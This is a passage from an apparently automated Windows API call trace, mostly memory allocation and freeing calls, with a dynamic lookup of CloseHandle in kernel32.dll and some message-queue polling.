out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.228] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.228] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.228] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.228] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.229] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0118.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.229] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.229] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0118.230] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.230] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.230] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0118.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0118.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0118.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0118.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0118.231] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.231] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0118.231] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0118.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.231] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0118.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0118.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0118.232] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0118.232] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0118.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.233] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.233] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.233] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0118.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0118.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0118.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.234] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0118.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0118.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.234] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0118.234] CloseHandle (hObject=0x2a0) returned 1 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.234] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.235] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.235] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0118.235] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.236] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0118.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0118.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0118.236] RtlAllocateHeap 